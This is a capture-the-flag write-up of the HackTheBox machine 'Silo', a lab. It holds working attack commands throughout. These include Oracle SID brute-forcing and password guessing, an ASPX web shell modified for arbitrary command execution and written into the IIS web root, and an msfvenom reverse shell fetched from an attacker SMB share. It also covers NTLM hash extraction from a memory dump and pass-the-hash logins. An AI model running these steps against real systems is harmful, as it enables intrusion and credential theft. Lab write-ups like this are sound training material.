HackTheBox | Silo

HackTheBox | Silo

a month ago   •   13 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Sun Aug 21 15:00:32 2022 as: nmap -T5 -p80,135,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 -A -oA scan-all -Pn 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.014s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-08-21T19:02:35
|_  start_date: 2022-08-21T18:59:31

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   12.52 ms 10.10.14.1
2   12.99 ms 10.10.10.82

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 21 15:02:41 2022 -- 1 IP address (1 host up) scanned in 129.39 seconds





Service Enumeration

TCP/445

Test SMB for anonymous share enumeration.

smbclient -L //$target -U '' --option="client min protocol=core"

NT_STATUS_LOGON_FAILURE – going to need a credential to connect to SMB.



TCP/80



Gobuster Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r

/aspnet_client        (Status: 403) [Size: 1233]



TCP/1521

nmap already ran the oracle-tns-version script on the port and fingerprinted it as Oracle TNS Listener 11.2.0.2.0 . I'm not very familiar with this service, but there is a brief overview of testing  it here.

1521,1522-1529 - Pentesting Oracle TNS Listener - HackTricks

Looking over the cheat sheet, the methodology for testing Oracle TNS Listener is:

  1. Get the version number
  2. Enumerate SIDs
  3. Test credentials
  4. Exploit
    • Remote Code Execution (RCE)
    • Get/Put files (possible RCE by putting a payload in the web root)
    • Possible privilege escalation on certain versions



Enumerate SIDs

Download the sids-oracle.txt file provided in the HackTricks cheat sheet. Then, let's use the suggested hydra command – with some modifications added by me – to brute force the SIDs.

hydra -V -L ./sids-oracle.txt -o found-sids.txt -s 1521 10.10.10.82 oracle-sid
cat ./found-sids.txt

[1521][oracle-sid] host: 10.10.10.82
[1521][oracle-sid] host: 10.10.10.82   login: CLRExtProc
[1521][oracle-sid] host: 10.10.10.82   login: PLSExtProc
[1521][oracle-sid] host: 10.10.10.82   login: XE



Test Credentials

I tested the offline cracking methodology described here in the cheat sheet. I found that the XE SID is the only SID that would return user hashes. Unfortunately, I don't have a super strong GPU to brute-force hashes and the word list I used was not returning anything valid.

I am going to use the odat tool mentioned in the cheat sheet. A couple dependencies were not installed, so just noting here what I installed:

python3 -m pip install python-libnmap
python3 -m pip install pycryptodome

Now, we can get to work.

./odat.py --help
./odat.py passwordguesser --help
./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --both-ul



Time to Exploit

We've completed all three prerequisites to exploit the target as discussed above:

  1. Get the version number
  2. Enumerate SIDs
    • Valid SID: XE
  3. Test credentials
    • Valid Credentials: scott/tiger

First, let's install the sqlplus client so we can connect to the database and double-check the credential

sudo apt update
sudo apt install -y oracle-instantclient-sqlplus

# Set an environment variable so the sqlplus client
# Can load the shared libraries
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib

# Add the environment variable to .zshrc so that
# It's set every time a shell opens
echo 'export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib' >> ~/.zshrc

Now, let's try connecting to the database.

sqlplus scott/tiger@10.10.10.82/XE 'as sysdba';





Exploit

Test Web Root Upload

Let's see if we can abuse the IIS web server to upload a shell and gain a foothold. First, let's see if we can upload a test.html file to the web root.

echo '<h1>Hello, world! From 0xBEN</h1>' > test.html

Now, we'll connect to the database as the administrator using the --sysdba flag and write the test.html file to the web root, C:\inetpub\wwwroot .

./odat.py utlfile --help
./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' test.html test.html --sysdba



Upload Web Pseudo-shell

I am going to use this code as a template for my pseudo-shell. All credit goes to the author.

Simple ASPX application (vulnerable to OS command injections)
Simple ASPX application (vulnerable to OS command injections) - ping.aspx

Download the code:

wget https://gist.githubusercontent.com/stasinopoulos/95ce3d164fec1d477f80ea3675be2021/raw/b2fdbda6798f015a452df37f792bbc2b99c97b06/ping.aspx -O cmd.aspx

Now, I'm going to change this line of code:

Before

psi.Arguments = "/c ping -n 2 " + arg;

After

psi.Arguments = "/c " + arg;

Now, let's upload the file to the web root.

./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' cmd.aspx cmd.aspx --sysdba



Transfer a Reverse Shell

I used my pseudo-shell to run systeminfo and find out more about the target operating system. Using our pseudo-shell, let's create a reverse shell payload with msfvenom and transfer it to the target.

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o 0xBEN_shell.exe

Now, we'll start a SMB server to host the file and execute it on the target.

smbserver.py -smb2support evil $PWD
Start a SMB server
sudo rlwrap nc -lnvp 443
Start a TCP listener





Post-Exploit Enumeration

Current User

Click to expand
User Name                  SID                                                          
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled



OS & Kernel

Click to expand
Host Name:                 SILO
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-00115-23036-AA976
Original Install Date:     12/31/2017, 11:01:23 PM
System Boot Time:          8/28/2022, 1:33:39 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,086 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,491 MB
Virtual Memory: In Use:    1,308 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 149 Hotfix(s) Installed.
                           [01]: KB2868626
                           [02]: KB2883200
                           [03]: KB2887595
                           [04]: KB2894852
                           [05]: KB2903939
                           [06]: KB2911106
                           [07]: KB2919355
                           [08]: KB2919394
                           [09]: KB2928680
                           [10]: KB2934520
                           [11]: KB2938066
                           [12]: KB2954879
                           [13]: KB2966826
                           [14]: KB2966828
                           [15]: KB2967917
                           [16]: KB2968296
                           [17]: KB2972103
                           [18]: KB2973114
                           [19]: KB2973351
                           [20]: KB2989930
                           [21]: KB3000850
                           [22]: KB3003057
                           [23]: KB3004361
                           [24]: KB3004365
                           [25]: KB3012702
                           [26]: KB3013172
                           [27]: KB3013791
                           [28]: KB3014442
                           [29]: KB3019978
                           [30]: KB3021910
                           [31]: KB3022777
                           [32]: KB3023219
                           [33]: KB3023266
                           [34]: KB3024751
                           [35]: KB3024755
                           [36]: KB3029603
                           [37]: KB3030377
                           [38]: KB3030947
                           [39]: KB3033446
                           [40]: KB3035126
                           [41]: KB3036612
                           [42]: KB3037576
                           [43]: KB3037924
                           [44]: KB3038002
                           [45]: KB3042085
                           [46]: KB3043812
                           [47]: KB3044374
                           [48]: KB3044673
                           [49]: KB3045634
                           [50]: KB3045685
                           [51]: KB3045717
                           [52]: KB3045719
                           [53]: KB3045755
                           [54]: KB3045992
                           [55]: KB3045999
                           [56]: KB3046017
                           [57]: KB3046737
                           [58]: KB3048043
                           [59]: KB3054169
                           [60]: KB3054203
                           [61]: KB3054256
                           [62]: KB3054464
                           [63]: KB3055323
                           [64]: KB3055343
                           [65]: KB3055642
                           [66]: KB3059317
                           [67]: KB3060681
                           [68]: KB3060793
                           [69]: KB3061512
                           [70]: KB3063843
                           [71]: KB3071756
                           [72]: KB3072307
                           [73]: KB3074228
                           [74]: KB3074545
                           [75]: KB3075220
                           [76]: KB3077715
                           [77]: KB3078405
                           [78]: KB3078676
                           [79]: KB3080042
                           [80]: KB3080149
                           [81]: KB3082089
                           [82]: KB3084135
                           [83]: KB3086255
                           [84]: KB3087041
                           [85]: KB3087137
                           [86]: KB3091297
                           [87]: KB3092601
                           [88]: KB3092627
                           [89]: KB3094486
                           [90]: KB3095701
                           [91]: KB3097992
                           [92]: KB3099834
                           [93]: KB3100473
                           [94]: KB3103616
                           [95]: KB3103696
                           [96]: KB3103709
                           [97]: KB3109103
                           [98]: KB3109976
                           [99]: KB3110329
                           [100]: KB3115224
                           [101]: KB3121261
                           [102]: KB3121461
                           [103]: KB3122651
                           [104]: KB3123245
                           [105]: KB3126033
                           [106]: KB3126434
                           [107]: KB3126587
                           [108]: KB3127222
                           [109]: KB3128650
                           [110]: KB3133043
                           [111]: KB3133690
                           [112]: KB3134179
                           [113]: KB3134815
                           [114]: KB3137728
                           [115]: KB3138602
                           [116]: KB3139164
                           [117]: KB3139398
                           [118]: KB3139914
                           [119]: KB3140219
                           [120]: KB3140234
                           [121]: KB3145384
                           [122]: KB3145432
                           [123]: KB3146604
                           [124]: KB3146723
                           [125]: KB3146751
                           [126]: KB3147071
                           [127]: KB3153704
                           [128]: KB3155784
                           [129]: KB3156059
                           [130]: KB3159398
                           [131]: KB3161949
                           [132]: KB3161958
                           [133]: KB3162343
                           [134]: KB3169704
                           [135]: KB3172614
                           [136]: KB3172729
                           [137]: KB3173424
                           [138]: KB3175024
                           [139]: KB3178539
                           [140]: KB3179574
                           [141]: KB3186539
                           [142]: KB4033369
                           [143]: KB4033428
                           [144]: KB4040972
                           [145]: KB4040974
                           [146]: KB4040981
                           [147]: KB4041777
                           [148]: KB4054854
                           [149]: KB4054519
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.82
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.



Users

Click to expand
User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    Phineas



Groups

Click to expand
SILO\Access Control Assistance Operators
SILO\Administrators
SILO\Backup Operators
SILO\Certificate Service DCOM Access
SILO\Cryptographic Operators
SILO\Distributed COM Users
SILO\Event Log Readers
SILO\Guests
SILO\Hyper-V Administrators
SILO\IIS_IUSRS
SILO\Network Configuration Operators
SILO\Performance Log Users
SILO\Performance Monitor Users
SILO\Power Users
SILO\Print Operators
SILO\RDS Endpoint Servers
SILO\RDS Management Servers
SILO\RDS Remote Access Servers
SILO\Remote Desktop Users
SILO\Remote Management Users
SILO\Replicator
SILO\Users
SILO\ORA_DBA
SILO\WinRMRemoteWMIUsers__



Network

Interfaces
Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.82
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 


ARP Table
N/A


Routes
N/A


Open Ports
TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       620
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1521           0.0.0.0:0              LISTENING       1212
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       428
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       760
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       828
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:49159          0.0.0.0:0              LISTENING       1076
  TCP    0.0.0.0:49160          0.0.0.0:0              LISTENING       528
  TCP    0.0.0.0:49161          0.0.0.0:0              LISTENING       520
  TCP    0.0.0.0:49162          0.0.0.0:0              LISTENING       1804
  TCP    10.10.10.82:139        0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       1212
  TCP    127.0.0.1:49156        0.0.0.0:0              LISTENING       1212
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       620
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1521              [::]:0                 LISTENING       1212
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       428
  TCP    [::]:49153             [::]:0                 LISTENING       760
  TCP    [::]:49154             [::]:0                 LISTENING       828
  TCP    [::]:49155             [::]:0                 LISTENING       904
  TCP    [::]:49159             [::]:0                 LISTENING       1076
  TCP    [::]:49160             [::]:0                 LISTENING       528
  TCP    [::]:49161             [::]:0                 LISTENING       520
  TCP    [::]:49162             [::]:0                 LISTENING       1804


Ping Sweep
N/A



Processes

Click to expand
No interesting processes



Services

Click to expand
No interesting services runnning, no candidates for path injection.



Scheduled Tasks

Click to expand
No interesting tasks outside of default system tasks.



Interesting Files

C:\Users\Phineas\Desktop\Oracle issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link 
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
?%Hm8646uC$

NOTE: The password for the Dropbox file would not work for me, so I had to glance at a walkthrough for answers. Turns out there was an encoding issue causing the £ character to display as ?. The actual password is £%Hm8646uC$

Open the Dropbox link in your browser and enter the supplied password.





Privilege Escalation

We're provided with a SILO-20180105-221806.zip file from Dropbox. If you unzip it, you'll find a memory dump file .DMP that we need to analyze.

Reading the Crash Dump

Download Volatility

Use Linux Standalone executable unzip the archive.

Release Downloads | Volatility Foundation
wget http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip
unzip volatility_2.6_lin64_standalone.zip
cp volatility_2.6_lin64_standalone/volatility_2.6_lin64_standalone ./volatility



Analyze the Dump File

Using the systeminfo command output from before, we know we're dealing with a Microsoft Windows Server 2012 R2 Standard x64 operating system. This is critical to know, as it will enable Volatility to read the memory artifacts correctly.

# Show help message
./volatility --help

# List profiles (and other info)
./volatility --info
./volatility --info | grep 2012

# This command will take a bit to run
# Dump NTLM hashes from memory
./volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump

Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::



Pass the Hash

We'll practice this with a few options:

# pth-winexe
pth-winexe -U 'Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' //10.10.10.82 cmd.exe

# smbexec.py
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@10.10.10.82'

# psexec.py
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@10.10.10.82' cmd.exe

# CrackMapExec
# Create a payload
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o 0xBEN_shell.exe
# Host it with SMB server
smbserver.py -smb2support evil $PWD
# Start a listener
sudo rlwrap nc -lnvp 443
# Connect to SMB as the Administrator and run the payload from the SMB server on Kali
crackmapexec smb 10.10.10.82 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' --local-auth -x '\\10.10.14.2\evil\0xBEN_shell.exe'

pth-winexe
smbexec.py
psexec.py
crackmapexec





Flags

C:\Users\Phineas\Desktop\user.txt
d51d472f0450de8c1cdb3e993dc309e6


C:\Users\Administrator\Desktop\root.txt
8643321264a1f5ea49f453ad7a392725

Spread the word

Keep reading